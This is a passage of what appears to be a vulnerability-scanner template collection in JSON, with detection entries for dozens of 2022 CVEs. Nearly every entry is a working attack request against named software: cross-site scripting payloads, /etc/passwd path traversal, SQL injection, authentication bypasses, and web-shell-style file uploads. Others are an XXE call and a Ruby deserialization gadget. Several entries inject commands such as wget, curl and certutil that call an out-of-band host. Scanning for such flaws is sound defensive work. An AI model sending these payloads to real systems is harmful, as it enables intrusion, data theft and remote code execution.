/wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, '<script>alert(document.domain)</script>')","contains(body_2, 'advanced-booking-calendar')","contains(header_2, 'text/html')","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2022-0212","info":{"name":"WordPress Spider Calendar <=1.5.65 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["spider_Calendar_theme","</script><img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0653","info":{"name":"Wordpress Profile Builder Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"javascript:alert(document.domain);\">here</a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35151","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","\u56fe\u7247\u9884\u89c8"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24900","info":{"name":"Piano LED Visualizer 1.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4295","info":{"name":"Show all comments < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<script>alert(document.domain)</script>\")","contains(body, \"Select </option>\")"],"condition":"and"}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26833","info":{"name":"Open Automation Software OAS Platform V16.00.0121 - Missing Authentication","severity":"critical"},"requests":[{"raw":["POST /OASREST/v2/authenticate HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nConnection: keep-alive\nContent-Type: application/json\n\n{\"username\": \"\", \"password\": \"\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"status\":","\"data\":","\"token\":","\"clientid\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32018","info":{"name":"Complete Online Job Search System 1.0 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2022-27985","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /alerts/alertLightbox.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nurl=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile&params%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-&params%5Breference%5D=41&uniqueClass=new_content_3983163\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40843","info":{"name":"Tenda AC1200 V-W15Ev2 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /goform/downloadSyslog/syslog.log HTTP/1.1\nHost: {{Hostname}}\nCookie: W15Ev2_user=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["^0\\d{3}$"]},{"type":"word","part":"body","words":["[system]","[error]","[wan1]"],"condition":"or"},{"type":"word","part":"header","words":["Content-type: config/conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23178","info":{"name":"Crestron Device - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/aj.html?a=devi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uname\":","\"upassword\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43169","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&notes=&ldap_filter=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-29464","info":{"name":"WSO2 Management - Arbitrary File Upload & Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /fileupload/toolsAny HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\nContent-Length: 348\n\n-----------------------------250033711231076532771336998311\nContent-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\n<% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n-----------------------------250033711231076532771336998311--\n","GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, 'WSO2-RCE-CVE-2022-29464')"]}]}]},{"id":"CVE-2022-30073","info":{"name":"WBCE CMS 1.5.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nformtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n","GET /admin/users/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<p><b><script>alert(document.cookie)</script>","WBCECMS"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"formtoken","group":1,"regex":["<input\\stype=\"hidden\"\\sname=\"formtoken\"\\svalue=\"([^\"]*)\"\\s/>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-33119","info":{"name":"NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: \"><script>alert(document.domain)</script><\"\n\nlanguage=en&user=user&pass=pass&submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains(header, \"text/html\")","status_code == 200","contains(body,'<script>alert(document.domain)</script><\\\"?cmd=')"],"condition":"and"}]}]},{"id":"CVE-2022-0281","info":{"name":"Microweber Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/users/search_authors"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"display_name\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-25481","info":{"name":"ThinkPHP 5.0.24 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?s=example"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","REQUEST_TIME","ThinkPHP Constants"],"condition":"and"},{"type":"status","status":[200,500,404],"condition":"or"}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44951","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28022","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-31879","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5('CVE-2022-25487');?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7ee3686858eb89dd68ccf85f0ea03abe"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File 